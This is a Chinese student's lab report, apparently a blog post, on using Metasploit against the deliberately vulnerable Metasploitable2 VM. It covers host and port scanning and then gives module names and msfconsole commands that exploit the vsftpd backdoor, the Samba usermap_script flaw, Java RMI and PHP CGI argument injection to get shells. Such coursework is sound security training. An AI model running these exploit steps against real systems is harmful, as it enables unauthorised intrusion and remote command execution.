20222323 2024-2025-1 《网络与系统攻防技术》实验六实验报告

1.实验内容

掌握metasploit的用法。
下载官方靶机Metasploitable2,完成下面实验内容。
(1)前期渗透

①主机发现(可用Aux中的arp_sweep,search一下就可以use)

②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等。

③选做:也可以扫系统版本、漏洞等。

(2)Vsftpd源码包后门漏洞(21端口)

(3)SambaMS-RPC Shell命令注入漏洞(端口139)

(4)Java RMI SERVER命令执行漏洞(1099端口)

(5)PHP CGI参数执行注入漏洞(80端口)

2.实验过程

下载过程参照官方指导书,此处不再赘述。

(1)前期渗透
①主机发现:
先检查主机是否能ping通靶机:

查看靶机ip地址:

用主机ping靶机:

进入msfconsole控制台:

使用search arp_sweep进行搜索:

use 0后查看所需参数,show options:

设置靶机IP:set rhosts 192.168.1.102
运行run:

扫描到了靶机

②端口扫描:
使用portscan:
search portscan/tcp,use 0后show options:

设置目的端口、靶机IP等参数后运行:

扫描到了0-65535中的以下端口:

③扫描目标http服务器的版本信息:

use auxiliary/scanner/http/http_version,set RHOST 192.168.1.102,然后run:

(2)Vsftpd源码包后门漏洞(21端口)

漏洞原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“😃”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。

利用步骤:

在kali中执行msfconsole 启动metasploit

use exploit/unix/ftp/vsftpd_234_backdoor 选择漏洞:

set RHOST 192.168.1.102 设置要攻击的机器IP(靶机IP):

exploit/run 开始攻击
利用成功,执行uname –a、 pwd、 id等命令 验证

(3)SambaMS-RPC Shell命令注入漏洞(端口139)

漏洞原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。

use exploit/multi/samba/usermap_script 选择漏洞:

set RHOST 192.168.1.102设置要攻击的机器IP(靶机IP):

exploit 开始攻击

利用成功 执行uname–a验证:

(4)Java RMI SERVER命令执行漏洞(1099端口)

漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。

操作步骤:

首先查看1099端口是否打开。

然后在MSF中:
use exploit/multi/misc/java_rmi_server

show options 查看配置参数

set RHOST (靶机IP) 192.168.1.102

exploit/run

sessions -i id

shell (进入meterpreter时,使用whoami验证下)

(5)PHP CGI参数执行注入漏洞(80端口)

漏洞原理:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。

在kali中执行msfconsole,启动metasploit

use exploit/multi/http/php_cgi_arg_injection 选择漏洞

set RHOST 192.168.1.102 设置要攻击的机器IP

exploit/run 开始攻击

shell后ls进行验证:

3.问题及解决方案

  • 问题1:第四步whoami验证时显示命令不存在

  • 问题1解决方案:whoami这个命令只在shell中存在,之前我是把shell关了所以不能用whoami

4.学习感悟、思考等

通过本次Metasploit的实践学习,我深刻体会到了渗透测试的重要性以及Metasploit在其中的强大作用。从主机发现到端口扫描,再到具体漏洞的利用,每一步都让我对网络安全有了更深入的理解。特别是在利用Vsftpd后门漏洞、Samba MS-RPC漏洞、Java RMI SERVER漏洞以及PHP CGI参数执行注入漏洞时,我深刻感受到了攻击者可能利用的多种途径和手法。同时,我也意识到,网络安全需要不断学习和更新知识,以应对不断变化的威胁环境。这次实践不仅提升了我的技术能力,更让我对网络安全有了更加全面的认识。

参考资料

https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/

posted @ 2024-11-16 14:35  超高校级的绝望  阅读(19)  评论(0编辑  收藏  举报